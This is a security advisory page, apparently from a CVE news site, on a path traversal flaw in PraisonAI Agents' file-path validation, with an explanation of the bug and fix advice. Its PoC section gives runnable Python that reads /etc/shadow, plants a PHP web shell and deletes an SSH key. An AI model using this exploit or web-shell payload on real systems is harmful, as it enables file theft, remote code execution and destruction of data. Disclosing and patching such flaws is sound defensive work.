PraisonAI Agents, Path Traversal, Critical

Listen to this Post

The vulnerability works due to a logical flaw in the `_validate_path()` method. The function first calls `os.path.normpath()` on the user-supplied filepath, which collapses all `..` sequences (e.g., `/tmp/../etc/passwd` becomes /etc/passwd). After normalization, it checks if the string `’..’` exists in the normalized path. Because `normpath()` has already removed all `..` sequences, this check always returns false. Thus, any path traversal attempt passes validation. Additionally, the function does not resolve symbolic links, allowing an attacker to bypass restrictions if they can control a symlink pointing to a sensitive file. The vulnerable code resides in `src/praisonai-agents/praisonaiagents/tools/file_tools.py` lines 42-49. An attacker can read, write, or delete arbitrary files by supplying paths like /tmp/../etc/passwd. The severity is critical with CVSS 9.2, as no authentication or user interaction is required, and full file system access is achievable.

dailycve form:

Platform: PraisonAI Agents
Version: Unspecified (all)
Vulnerability: Path Traversal
Severity: Critical
date: 2026-04-07

Prediction: 2026-04-21

What Undercode Say:

Check if vulnerable file exists
grep -n "_validate_path" src/praisonai-agents/praisonaiagents/tools/file_tools.py
Simulate the vulnerable check
python3 -c "from praisonaiagents.tools.file_tools import FileTools; print(FileTools._validate_path('/tmp/../etc/passwd'))"
Exploit read_file
python3 -c "from praisonaiagents.tools.file_tools import FileTools; print(FileTools.read_file('/tmp/../etc/passwd'))"

Exploit:

poc.py
from praisonaiagents.tools.file_tools import FileTools
Read sensitive file
print(FileTools.read_file('/tmp/../etc/shadow'))
Write arbitrary file
print(FileTools.write_file('/tmp/../var/www/html/shell.php', '<?php system($_GET["cmd"]); ?>'))
Delete file
print(FileTools.delete_file('/tmp/../home/user/.ssh/id_rsa'))

Protection from this CVE:

  • Patch by moving the `’..’` check before calling os.path.normpath(), e.g., if '..' in filepath: raise ValueError.
  • Use `os.path.realpath()` instead of `abspath()` to resolve symlinks.
  • Implement an allowlist of allowed base directories (e.g., using os.path.commonpath).
  • Apply vendor patch as soon as released (predicted 2026-04-21).

Impact:

  • Complete file system read access (e.g., /etc/passwd, /etc/shadow, SSH keys, configuration files).
  • Unauthorized write access leading to remote code execution (e.g., writing web shells or cron jobs).
  • Deletion of critical files causing denial of service.
  • Data breach and privilege escalation via reading application secrets.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top